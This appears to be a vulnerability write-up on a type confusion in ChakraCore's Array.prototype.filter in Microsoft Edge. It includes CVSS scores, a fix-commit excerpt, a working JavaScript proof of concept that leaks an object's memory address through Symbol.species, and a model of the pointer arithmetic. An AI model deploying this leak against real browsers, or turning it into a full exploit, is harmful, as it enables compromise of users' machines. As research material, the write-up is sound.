CVSS3: 7.5 High

| Metric | Value |
|---|---|
| Attack Vector | NETWORK |
| Attack Complexity | HIGH |
| Privileges Required | NONE |
| User Interaction | REQUIRED |
| Scope | UNCHANGED |
| Confidentiality Impact | HIGH |
| Integrity Impact | HIGH |
| Availability Impact | HIGH |

Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

CVSS2: 7.6 High

| Metric | Value |
|---|---|
| Access Vector | NETWORK |
| Access Complexity | HIGH |
| Authentication | NONE |
| Confidentiality Impact | COMPLETE |
| Integrity Impact | COMPLETE |
| Availability Impact | COMPLETE |

Vector: AV:N/AC:H/Au:N/C:C/I:C/A:C

EPSS: 0.971 High (percentile 99.7%)
## 1. Analysis of the environment

Operating system: Windows 10 x64 Professional Edition 10.0.14393
Browser: Microsoft Edge x64 38.14393.0

The bug is a type confusion in JavascriptArray::FilterHelper, the implementation behind Array.prototype.filter. The relevant part of the function is shown below, taken from the fix commit; the lines marked with `-` are the ones that commit removed.
```cpp
template <typename T>
Var JavascriptArray::FilterHelper(JavascriptArray* pArr, RecyclableObject* obj, T length, Arguments& args, ScriptContext* scriptContext)
{
    if (args.Info.Count < 2 || !JavascriptConversion::IsCallable(args[1]))
    {
        JavascriptError::ThrowTypeError(scriptContext, JSERR_FunctionArgument_NeedFunction, _u("Array.prototype.filter"));
    }

    RecyclableObject* callBackFn = RecyclableObject::FromVar(args[1]);
    Var thisArg = nullptr;

    if (args.Info.Count > 2)
    {
        thisArg = args[2];
    }
    else
    {
        thisArg = scriptContext->GetLibrary()->GetUndefined();
    }

    // If the source object is an Array exotic object we should try to load the constructor property and use it to construct the return object.
-   RecyclableObject* newObj = ArraySpeciesCreate(obj, 0, scriptContext);

    // ... (per-element loop elided) ...

    selected = callBackFn->GetEntryPoint()(callBackFn, CallInfo(CallFlags_Value, 4), thisArg,
        element,
        JavascriptNumber::ToVar(k, scriptContext),
        pArr);

    if (JavascriptConversion::ToBoolean(selected, scriptContext))
    {
        // Try to fast path if the return object is an array
-       if (newArr)
```
The PoC below triggers this path. `MyArray` overrides `Symbol.species` with `dummy`, whose constructor returns `d`. `d` was created from integer literals, so the engine stores it as a native int array with 4-byte elements, yet `filter` still takes its array fast path and writes the 8-byte Var of every element of `a` into it. Reading `o[item]` back therefore returns the raw pointer bits as int32 values; negative ones are made unsigned by adding 0x100000000. The element `t` sits at index 1 of `a`, so its pointer occupies slots 2 (low dword) and 3 (high dword), which is why the function returns `[h[3], h[2]]` as `[hi, lo]`.
```javascript
// The object whose address is leaked: an int array placed at index 1 of `a` below.
var x = (new Array(56, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0)).slice();
var [hi, lo] = PutDataAndGetAddr(x);

function PutDataAndGetAddr(t) {
    // Native int array that filter ends up using as its result array.
    var d = new Array(1, 2, 3);
    class dummy {
        constructor() { return d; }
    }
    // ArraySpeciesCreate consults Symbol.species and so constructs via dummy.
    class MyArray extends Array {
        static get [Symbol.species]() { return dummy; }
    }
    var a = new Array({}, t, "theori", 7, 7, 7, 7, 7);
    function test(i) { return true; }
    a.__proto__ = MyArray.prototype;
    // Each element of a is stored into d's 4-byte slots as an 8-byte Var.
    var o = a.filter(test);
    var h = [];
    for (var item in o) {
        var n = new Number(o[item]);
        if (n < 0) {
            n = n + 0x100000000; // slot read back as signed int32; make it unsigned
        }
        h.push(n);
    }
    // t is element 1 of a: low dword in slot 2, high dword in slot 3.
    return [h[3], h[2]];
}
```
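As an added example (written for this page, not code from the original write-up or from ChakraCore), the model below reproduces the memory-layout arithmetic the PoC relies on, so the `[h[3], h[2]]` indexing and the `n < 0` fix-up can be checked without the vulnerable engine. It assumes what the PoC implies: 8-byte Var pointers written into an array of 4-byte int slots on little-endian x64, so Var k occupies int slots 2k (low dword) and 2k+1 (high dword). The pointer values are constructed sample data, not real heap addresses.

```javascript
// Model of a native int array's element storage: a raw buffer viewed as int32.
function makeIntArray(length) {
  const buf = new ArrayBuffer(length * 4);
  return { buf, i32: new Int32Array(buf), length };
}

// Model of the confused fast-path store: the engine believes it is writing
// element k of an 8-byte Var array, so the write lands at byte offset 8*k
// (assumption: little-endian x64, 8-byte Var, 4-byte int slot).
function confusedStoreVar(arr, k, addr) {
  const view = new DataView(arr.buf);
  view.setBigUint64(8 * k, BigInt.asUintN(64, addr), true);
}

// The PoC's fix-up: an int32 slot read back as signed is made unsigned.
function toUnsigned32(n) {
  return n < 0 ? n + 0x100000000 : n;
}

// Recover [hi, lo] for the pointer stored as Var k, exactly as the PoC's
// `return [h[3], h[2]]` does for k = 1 (the element holding t).
function leakedHiLo(arr, k) {
  const lo = toUnsigned32(arr.i32[2 * k]);
  const hi = toUnsigned32(arr.i32[2 * k + 1]);
  return [hi, lo];
}

// Reassemble the two dwords into a 64-bit address.
function hiLoToAddress([hi, lo]) {
  return (BigInt(hi) << 32n) | BigInt(lo);
}

// Constructed sample: three made-up pointers standing in for {}, t and "theori".
// The second and third have the sign bit of the low dword set, so they exercise
// the negative-slot fix-up. Returns one boolean per pointer: true if the value
// read back through the "int" view equals the pointer that was stored.
function demo() {
  const arr = makeIntArray(16);
  const fakePtrs = [0x000001c4a2b40010n, 0x000001c49ab58000n, 0x000001c4ffff0000n];
  fakePtrs.forEach((p, k) => confusedStoreVar(arr, k, p));
  return fakePtrs.map((p, k) => hiLoToAddress(leakedHiLo(arr, k)) === p);
}
```

The model shows why the PoC can afford to read only two slots per object: after the confused store, the int view of the array is simply the little-endian byte image of the pointers, and the only cleanup needed is the signed-to-unsigned conversion of each dword.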